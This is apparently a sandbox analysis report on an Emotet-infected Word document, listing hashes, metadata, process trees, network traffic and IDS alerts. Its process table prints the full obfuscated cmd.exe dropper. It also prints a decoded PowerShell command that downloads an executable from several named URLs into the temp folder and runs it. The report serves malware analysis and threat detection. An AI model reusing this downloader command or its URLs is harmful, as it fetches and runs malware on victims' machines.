File name: | FA0039_14.doc |
Full analysis: | https://app.any.run/tasks/aa1cdc47-8f55-43da-90b6-a2742a2d6e48 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It targets mostly corporate victims, but private users also get infected through mass spam email campaigns. |
Analysis date: | December 06, 2018, 15:44:22 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 3 16:09:00 2018, Last Saved Time/Date: Mon Dec 3 16:09:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 27, Security: 0 |
MD5: | 5DB3E60394D1E758FD885EDB9418C1FC |
SHA1: | 92A266FF19E7E23957EF172F10A93F9793C2ADD6 |
SHA256: | 47B6436CE1408594952CF1CDDE2EDFFC0E5CEA52352450D801FA586ED129D512 |
SSDEEP: | 3072:/Rp8GhDS0o9zTGOZD6EbzCdfHyt20rBCU9:/xoUOZDlbefEZrBCU9 |
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
CompObjUserTypeLen: | 32 |
HeadingPairs: | |
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 30 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 27 |
Words: | 4 |
Pages: | 1 |
ModifyDate: | 2018:12:03 16:09:00 |
CreateDate: | 2018:12:03 16:09:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2988 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA0039_14.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
4056 | c:\pJLlhvXw\JQWXulfJpVDw\zlQwGwnf\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set jzNy=F# ;]C:'PwiT=^<iK^<:di hX': H=(kPqsA/am7nQ*7S$,8d}P =}Uew{Z}@h%;#cB]atJD,aQZnc'O^|}TZ^&}/^>y;-cJk-b^&ad#oeiK]r-sDb7)e;cZV'7t:bx9gmA:DUYa)'^&Tq=Mm;d+a?P;9Ak^&af$UVo;{`=cm^>%Ej.WJ E^|3bb5484c-acd3-5883-ae5d-000aa204eed3 #Q \0Fm5]be~(Ptf)kIwO^>-mB3eC(0kK@vo-zJvYCHn0wjI^>$E{ q: d.E)3/P0beH0atN0=Pa0*^>e8`J6 z{Ne.#+gzTy-e^&w ^<U8hvK,tG)_g2l_nHgBeGJblkHE.b.^>)SLpcv}*EhACJWIN$,.t @=$mnsDeesXto^>9IV,F-3Qjt(@ueS{zG`;^>(s}n(dya G:1f\ ^>If(7;1=7'2*iF:0{Ze3^<E/L6'`,X=?BPJIW^&aZ+xU6j1$RiC;BIv)y'IcjD3EKP=JCl5$^>+ ARr,z-PP0i6q:%`i:?2$f%\(tW^|e-uwlVQIi~\1FPo3d5[ca3;yoL=~lsR^>n?@awOiLoJe~DrdA.D@uSqIDET}fR/*N$X}`{%pMy(^|vr{L(t4x-{d8q)Qqpi8SJBIz$fHG~$k? ]lyn;7KiD^<g [shP^>*LqL$liJm^|$9uN(Nd[h;-Rcqn]a8Kqeso-r6/Dou[7fH4l;%}c'8%reEzXxT1Le`a0.osL'bZa+4-ZDRW^>i8Z[FCFK$6nU+u%V'-0:\s{5'^|CW+*V=p@Z^|m}*oelxgt[`}:m'YvWx^|nakJeQE:$4Du=`xvc^>PtEf}_JvA%$jD};GIu'ECXd6[jPl%-Yvbf'M,%=t1NoxB2MWjkD;e)$Pm_;%wr'/;'778g2yLJ4OrD'} c io'=V=Y 6-{DQ^|.i(s^&FgA6$y{F;M5e'P?FFDr9q]:Vp~S;'HEm=1,OL-{poUw^&TZWF$twa;~lH)VAg's U@KWO'K-^|(3@Bt$@yiDaJlfCnp/.`SHS^|.i^>6'I^>~tno8RLw?1+b$3-^<hhdirNPu2DQzC/{0_eh15bx}P.NM]d`dYifw@rUi}gj.dt+:ir/76a^&FctbtosW^&^>/s'0/b^&~:0_@pPYOt}/ft:l2hu@]@gGVs?\^<OQCmD(e:yNFkifHbsr'^<mm/xWr8HL.sPM23%/D^>^|s`x+e-?Lg8p4agl;m(ghiRa%/R{dlU #pGWJ..,8n-p`alP4b6\0rQT-uuVEaV4;iP01w7;Jl9I#y8'HstkY/C.f/0Gw:_P=p,uzt;jftRgOhfK'@Ckc7:q+aRzsQ^|c3K[q 8OIwzJTDipAF/1tws-BZeU'0.*1^|rlt8oj'id)@'n?M euC}l_J+pny;s$;z/rLG/4U+:RW1pif]tT}Utb=)hgqM@2H}j:hbuyC47^&:SP0u?lk[=aJ$]L69cMGYqX*^&ImkFf/s\Ws[n\eL;A.~?TsyPHem$QtqOWi[znseKWnd^&_eF?/vk}Jeu]ls^|dM/'uT/ld{:QZwp9(ltJxmtwV9hm^&1@4mWM}5z70SCH?DoCG:}T'rTwohJKI$/Ss QFc^|vG=gG/w=YmkiLoRn_cD`3.Qtzs*:ue{JqmAO7iI'[tGf(ej*Ofv]jaRO+t^|i^<nK.Da:JlsKka/IPp/O'M:*]fp]F0tZ)At8=ehiC/'2po=9kgi(n]BQ-lfl:?$~$G;#1tthlznxPAeBnhib^>^<le^<vCh#wb9d[e7T,W\uU.uPqtuNOeL,UNNHu 0]Mtx`ccC9BeP0^>jz]Hbg}^>o]Pr-R(Ww:5feaP{nvT`=IoeSX*ME1jWR4GT$3~e;s5\'Rv(MD#MExHKDkW5'^&SQ=-Var$ co(@nPHa`f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %p in (1791,-4,3)do set Nn=!Nn!!jzNy:~%p,1!&&if %p==3 echo !Nn:*Nn!=! |FOR /F "tokens=3 delims=Dyu.jM" %o IN ('assoc^^^|find "d1="')DO %o -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2640 | CmD /V:ON/C"set jzNy=F# ;]C:'PwiT=^<iK^<:di hX': H=(kPqsA/am7nQ*7S$,8d}P =}Uew{Z}@h%;#cB]atJD,aQZnc'O^|}TZ^&}/^>y;-cJk-b^&ad#oeiK]r-sDb7)e;cZV'7t:bx9gmA:DUYa)'^&Tq=Mm;d+a?P;9Ak^&af$UVo;{`=cm^>%Ej.WJ E^|3bb5484c-acd3-5883-ae5d-000aa204eed3 #Q \0Fm5]be~(Ptf)kIwO^>-mB3eC(0kK@vo-zJvYCHn0wjI^>$E{ q: d.E)3/P0beH0atN0=Pa0*^>e8`J6 z{Ne.#+gzTy-e^&w ^<U8hvK,tG)_g2l_nHgBeGJblkHE.b.^>)SLpcv}*EhACJWIN$,.t @=$mnsDeesXto^>9IV,F-3Qjt(@ueS{zG`;^>(s}n(dya G:1f\ ^>If(7;1=7'2*iF:0{Ze3^<E/L6'`,X=?BPJIW^&aZ+xU6j1$RiC;BIv)y'IcjD3EKP=JCl5$^>+ ARr,z-PP0i6q:%`i:?2$f%\(tW^|e-uwlVQIi~\1FPo3d5[ca3;yoL=~lsR^>n?@awOiLoJe~DrdA.D@uSqIDET}fR/*N$X}`{%pMy(^|vr{L(t4x-{d8q)Qqpi8SJBIz$fHG~$k? ]lyn;7KiD^<g [shP^>*LqL$liJm^|$9uN(Nd[h;-Rcqn]a8Kqeso-r6/Dou[7fH4l;%}c'8%reEzXxT1Le`a0.osL'bZa+4-ZDRW^>i8Z[FCFK$6nU+u%V'-0:\s{5'^|CW+*V=p@Z^|m}*oelxgt[`}:m'YvWx^|nakJeQE:$4Du=`xvc^>PtEf}_JvA%$jD};GIu'ECXd6[jPl%-Yvbf'M,%=t1NoxB2MWjkD;e)$Pm_;%wr'/;'778g2yLJ4OrD'} c io'=V=Y 6-{DQ^|.i(s^&FgA6$y{F;M5e'P?FFDr9q]:Vp~S;'HEm=1,OL-{poUw^&TZWF$twa;~lH)VAg's U@KWO'K-^|(3@Bt$@yiDaJlfCnp/.`SHS^|.i^>6'I^>~tno8RLw?1+b$3-^<hhdirNPu2DQzC/{0_eh15bx}P.NM]d`dYifw@rUi}gj.dt+:ir/76a^&FctbtosW^&^>/s'0/b^&~:0_@pPYOt}/ft:l2hu@]@gGVs?\^<OQCmD(e:yNFkifHbsr'^<mm/xWr8HL.sPM23%/D^>^|s`x+e-?Lg8p4agl;m(ghiRa%/R{dlU #pGWJ..,8n-p`alP4b6\0rQT-uuVEaV4;iP01w7;Jl9I#y8'HstkY/C.f/0Gw:_P=p,uzt;jftRgOhfK'@Ckc7:q+aRzsQ^|c3K[q 8OIwzJTDipAF/1tws-BZeU'0.*1^|rlt8oj'id)@'n?M euC}l_J+pny;s$;z/rLG/4U+:RW1pif]tT}Utb=)hgqM@2H}j:hbuyC47^&:SP0u?lk[=aJ$]L69cMGYqX*^&ImkFf/s\Ws[n\eL;A.~?TsyPHem$QtqOWi[znseKWnd^&_eF?/vk}Jeu]ls^|dM/'uT/ld{:QZwp9(ltJxmtwV9hm^&1@4mWM}5z70SCH?DoCG:}T'rTwohJKI$/Ss QFc^|vG=gG/w=YmkiLoRn_cD`3.Qtzs*:ue{JqmAO7iI'[tGf(ej*Ofv]jaRO+t^|i^<nK.Da:JlsKka/IPp/O'M:*]fp]F0tZ)At8=ehiC/'2po=9kgi(n]BQ-lfl:?$~$G;#1tthlznxPAeBnhib^>^<le^<vCh#wb9d[e7T,W\uU.uPqtuNOeL,UNNHu 0]Mtx`ccC9BeP0^>jz]Hbg}^>o]Pr-R(Ww:5feaP{nvT`=IoeSX*ME1jWR4GT$3~e;s5\'Rv(MD#MExHKDkW5'^&SQ=-Var$ co(@nPHa`f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&for /L %p in (1791,-4,3)do set Nn=!Nn!!jzNy:~%p,1!&&if %p==3 echo !Nn:*Nn!=! |FOR /F "tokens=3 delims=Dyu.jM" %o IN ('assoc^^^|find "d1="')DO %o -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2184 | C:\Windows\system32\cmd.exe /S /D /c" echo $Por='DEM';$RES=new-object Net.WebClient;$fBi='http://santafetimes.com/GFSKwTCH7M@http://sevensites.es/mXMLalP7uj@http://splendor.es/iz8KQa7@http://sylwiaurban.pl/images/MLWmsiyDOs@http://startgrid.be/DNh31Rt'.Split('@');$ToL='pqF';$FiD = '427';$DMo='YPd';$JEc=$env:temp+'\'+$FiD+'.exe';foreach($iqP in $fBi){try{$RES.DownloadFile($iqP, $JEc);$UaJ='EZF';If ((Get-Item $JEc).length -ge 80000) {Invoke-Item $JEc;$kPd='Umb';break;}}catch{}}$Qaq='iKT'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2272 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=3 delims=Dyu.jM" %o IN ('assoc^|find "d1="') DO %o -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2716 | C:\Windows\system32\cmd.exe /c assoc|find "d1=" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2944 | C:\Windows\system32\cmd.exe /S /D /c" assoc" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3064 | find "d1=" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3812 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3552 | "C:\Users\admin\AppData\Local\Temp\427.exe" | C:\Users\admin\AppData\Local\Temp\427.exe | — | powershell.exe |
User: admin Company: Microsoft Corporatio Integrity Level: MEDIUM Description: Windows Exit code: 0 Version: 7.6.7601.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6D32.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PGWW6A49N9CB5F2V6OGK.temp | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~WRD0000.tmp | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~WRD0001.tmp | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFE72B5C1B397372CD.TMP | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF7FA0FC9E99940574.TMP | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ACC8F483-E3ED-4E61-B4DB-693B87133436}.tmp | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF3CC152151E32DA97.TMP | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{8C1A7498-E310-4B20-B3C7-42B35D0B7A8D}.tmp | — | |
MD5:— | SHA256:— | |||
2988 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B6ECEC136F257DBEEC2A501813555CA9 | SHA256:F3B8DE5FAA34C54EB1DDA6A87A0F1EA2FF12E83AA4443628DFF63C18488F4D3A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3812 | powershell.exe | GET | 301 | 91.142.223.120:80 | http://sevensites.es/mXMLalP7uj | ES | html | 303 b | malicious |
3812 | powershell.exe | GET | 404 | 67.210.98.100:80 | http://santafetimes.com/GFSKwTCH7M | US | html | 442 b | malicious |
3812 | powershell.exe | GET | 200 | 91.142.223.120:80 | http://sevensites.es/mXMLalP7uj/ | ES | executable | 516 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3812 | powershell.exe | 67.210.98.100:80 | santafetimes.com | Lunar Pages | US | malicious |
3812 | powershell.exe | 91.142.223.120:80 | sevensites.es | Infortelecom Hosting S.L. | ES | malicious |
Domain | IP | Reputation |
---|---|---|
santafetimes.com | | malicious |
sevensites.es | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3812 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3812 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3812 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3812 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3812 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |